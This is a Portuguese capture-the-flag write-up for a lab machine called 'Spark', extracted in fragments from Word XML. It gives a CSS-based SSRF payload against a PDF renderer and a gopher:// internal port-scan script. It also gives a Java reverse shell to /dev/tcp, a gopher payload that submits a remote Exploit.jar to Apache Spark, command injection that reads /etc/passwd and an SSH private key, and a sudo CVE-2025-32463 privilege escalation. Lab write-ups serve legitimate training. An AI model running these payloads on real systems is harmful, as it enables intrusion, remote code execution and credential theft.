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Spark.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a enumeração da máquina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verificar quais portas estavam abertas na aplicação.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25400" l="25400" r="25400" t="2540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a aplicação web em execução. Essa aplicação renderiza código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gerar arquivos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PDF.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00300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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um brute-force de arquivos e subdomínios, e foi encontrado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composer.json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//&lt;MACHINE-IP&gt;/FUZZ -w quickhits.txt -c -t 100 -fl 10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composer.json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por realizar a renderização do conteúdo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PDF.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5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Nessa biblioteca, também foi identificada uma má configuração que permite a injeção de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a exploração de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SSRF (Server-Side Request Forgery)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https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/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&lt;style&gt;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body {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background: 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"http://&lt;MACHINE-IP&gt;/"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&lt;/style&gt;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interceptar a requisição com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observar o envio de um parâmetro chamado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render.php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por gerar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PDF.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06600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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utilizar um script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realizar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scan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interno explorando o protocolo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gopher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identificar quais portas estavam abertas na rede interna.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threading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queue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"http://&lt;MACHINE-IP&gt;/render.php"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proxies = {</w:t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'http://127.0.0.1:8080'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'http://127.0.0.1:8080'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open_ports = []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lock = threading.Lock()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 = Queue()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THREADS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tune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TIMEOUT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seconds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 in range(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queue.put(p)</w:t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 scan():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not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queue.empty():</w:t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port = queue.get_nowait()</w:t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except:</w:t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 = {</w:t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"html"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&lt;style&gt;body {{background: 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'gopher://127.0.0.1:{port}/'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);}}&lt;/style&gt;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init = time.time()</w:t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r = requests.post(url, data=data, proxies=proxies, timeout=TIMEOUT)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elapsed = time.time() - init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if elapsed &gt; 2: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with lock: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[OPEN?] PORT = {port} | TIME = {elapsed:.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open_ports.append(port)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except requests.exceptions.Timeout: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elapsed = time.time() - init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with lock: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print(f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[OPEN] PORT = {port} | TIME = {elapsed:.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}s (timeout)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open_ports.append(port)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except requests.exceptions.RequestException as e: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[ERROR] PORT = {port} | {e}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queue.task_done()</w:t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 = []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_ in range(THREADS):</w:t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 = threading.Thread(target=scan)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t.daemon = True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t.start()</w:t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threads.append(t)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t in threads:</w:t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t.join()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\n[*] Potentially open ports: {open_ports}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5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6066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7077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8081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abertas, todas relacionadas aos serviços do</w:t>
      </w:r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Apache Spark.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Apache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Spark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6066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expõe a rota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/v1/submissions/create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o envio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jobs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execução.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dessa funcionalidade, é possível submeter um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previamente compilado, que será executado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poderá rodar comandos no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Exploit.java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criado contendo o código que será executado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 Spark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Em seguida, o arquivo é compilado para uso na etapa de exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079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compilar o exploit, foi utilizada a versão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OpenJDK 21.0.10 (2026-01-20)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Java.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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java.io.IOException;</w:t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Exploit {</w:t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try {</w:t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Runtime.getRuntime().exec(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String[]{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"/bin/bash"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"bash -i &gt;&amp; /dev/tcp/&lt;MACHINE-IP&gt;/443 0&gt;&amp;1"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 catch (IOException e) {</w:t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e.printStackTrace();</w:t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javac Exploit.java</w:t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jar cf Exploit.jar Exploit.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6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gerar a requisição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Gopher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correta, foi utilizado um script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contendo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por criar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 Spark.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Esse conteúdo é enviado ao serviço, que posteriormente realiza uma requisição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Exploit.jar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sua execução no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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urllib.parse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Your JAR exploit configuration</w:t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exploit_data = {</w:t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"CreateSubmissionRequest"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"clientSparkVersion"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"3.5.1"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# Match the version you saw in the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error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earlier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"appResource"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"http://&lt;VPN-IP&gt;/Exploit.jar"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"environmentVariables"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"SPARK_ENV_LOADED"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"1"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"mainClass"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"Exploit"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"spark.jars"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"http://VPN-IP&gt;/Exploit.jar"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"spark.driver.supervise"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"false"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"spark.app.name"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"l1z4rd_pwn"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"spark.submit.deployMode"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"cluster"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"spark.master"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"spark://127.0.0.1:7077"</w:t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json_payload = json.dumps(exploit_data)</w:t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Manual HTTP Header construction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http_request = (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 /v1/submissions/create HTTP/1.1\r\n"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"Host: 127.0.0.1:6066\r\n"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"Content-Type: application/json\r\n"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Content-Length: {len(json_payload)}\r\n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"Connection: close\r\n"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"\r\n"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{json_payload}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Encode for Gopher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gopher_payload = urllib.parse.quote(f"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_{http_request}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gopher_url = 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gopher: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//127.0.0.1:6066/{gopher_payload}"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print(gopher_url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6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parse.py</w:t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17600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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requisição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Gopher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enviada para a aplicação web, acionando o payload responsável por interagir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 Spark.</w:t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6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Logo após, foi observada uma requisição ao arquivo recém-criado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Exploit.jar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em seguida, a conexão reversa foi recebida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443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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60400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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9700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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dnte3mco3hho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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Foi obtida uma shell TTY interativa.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perl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'exec "/bin/sh";'</w:t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ctr+z</w:t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 raw -echo;fg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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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 raiz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.dockerenv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o ambiente em execução é um contêiner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Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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41600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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/var/backups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encontrados arquivos relevantes, incluindo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processo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backup.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Também foi identificada a pasta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processed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o comando já havia sido executado anteriormente dentro de uma fila de processamento. Se esse serviço estiver em execução na máquina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explorar seu funcionamento para realizar a escalada de privilégios do contêiner para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host.</w:t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6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7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verificar se o mecanismo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sendo executado pelo sistema, foi criado um arquivo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teste.backup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observar se o processo seria acionado automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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teste.backup</w:t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 -n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../backup_manager.log</w:t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7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Observou-se que o arquivo não apenas foi criado, como também teve o comando contido em seu interior executado pelo sistema no caso,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evidenciando a execução automática do conteúdo presente no arquivo. Dessa forma, foi possível obter execução de comandos no sistema, caracterizando uma vulnerabilidade do tipo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ler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foi identificado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Em seguida, foi verificado se esse usuário possuía uma chave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id_rsa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possibilitar o acesso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à máquina.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'cat${IFS}/etc/passwd'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teste.backup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9900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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usuário possuía uma chave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Após obter acesso a essa chave, foi possível realizar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login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máquina com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 /ho??/svc_back??/.s??/id_r*'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/var/backups/queue/cg.backup</w:t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0"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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do usuário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4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re2d1ykselmn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verificada a versão do sudo disponível na máquina por meio do comando.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sudo --version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25400" l="25400" r="25400" t="2540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versão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identificada foi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1.9.15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qual está associada à vulnerabilidade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CVE-2025-32463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escalada de privilégios. Como a máquina alvo não possui conexão com a internet, o exploit foi inicialmente baixado na máquina do atacante e, em seguida, transferido para o sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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 -r&lt;MACHINE-IP&gt;/CVE-2025-32463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clone https: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//github.com/zinzloun/CVE-2025-32463</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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4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executado, permitindo a escalada vertical de privilégios.</w:t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51100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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 obtemos acesso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sua flag consequentemente.</w:t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79600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"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footerReference r:id="rId43" w:type="first"/>
      <w:footerReference r:id="rId4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7" name="image23.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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1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p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ark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image" Target="media/image30.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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9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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spark-apache-org.translate.goog/?_x_tr_sl=en&amp;_x_tr_tl=pt&amp;_x_tr_hl=pt&amp;_x_tr_pto=t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jp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3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ATbFcSXJxwi60aZirGaK7CvBA==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguZG50ZTNtY28zaGhvMg5oLnJlMmQxeWtzZWxtbjIOaC42dnJvZ29ybTM2cTk4AHIhMXRodDktWUJIQmRsRmk3Z0kyYS1SNVVnamZRWEZjLW5J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